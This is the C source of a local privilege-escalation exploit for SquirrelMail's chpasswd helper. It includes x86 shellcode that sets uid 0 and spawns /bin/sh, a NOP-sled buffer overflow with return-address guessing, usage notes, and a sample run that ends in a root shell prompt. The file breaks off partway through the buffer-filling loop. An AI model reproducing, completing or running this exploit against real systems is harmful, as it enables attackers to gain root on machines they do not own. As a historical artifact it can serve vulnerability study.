sq-chpass-exp.c

Squirrelmail chpasswd local root exploit by deadcraft
<deadcraft@wsfib.pl>
Bug founded by Matias Neiff <matias at neiff.com.ar>

Should work with only full path to chpasswd specified, but if isn't
You can simply move RET address by adding second parameter, for example:

compilation: gcc -o sq-chpass-exp sq-chpass-exp.c

/sq-chpass-exp /path/to/chpasswd 100

RET = 0xbffff8bc
OFFSET = 0xbffff8e8
You forgot the New password.
Illegal instruction

deadcraft@dns:~/change_passwd$ ./sq-chpass-exp /path/to/chpasswd 700
RET = 0xbffffb14
OFFSET = 0xbffffb40
You forgot the New password.
sh-2.05a#

greetz to Bucz, evilcat and all friends;)

*/

#include <stdio.h>
#include <stdlib.h>

#define SIZE 150
#define SIZE2 500

char shellcode[]= "\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50"
"\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0"
"\xb0\x01\xcd\x80";

unsigned long get_esp() {
__asm__ ("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
int offset, ret, i;
char buf1[SIZE], buf2[SIZE2];

memset(buf2, 0x90, sizeof(buf2)-strlen(shellcode)-8);
memcpy(buf2 + sizeof(buf2)-strlen(shellcode)-8 , shellcode,
sizeof(shellcode));

if ((argc != 3) && (argc != 2)) {
printf("Usage: %s full path to chpasswd\n",argv[0]);
exit(0);
}

if (argc==3) {
offset=atoi(argv[2]);
ret=get_esp()+offset-strlen(shellcode)-strlen(argv[1]);
printf("OFFSET = 0x%x\n", get_esp() + offset);
}

else ret = 0xbffffb14;

printf("RET = 0x%x\n",ret);

for(i=0; i < SIZE; i+=4)
{
* (long *) &buf1[i] = ret;
}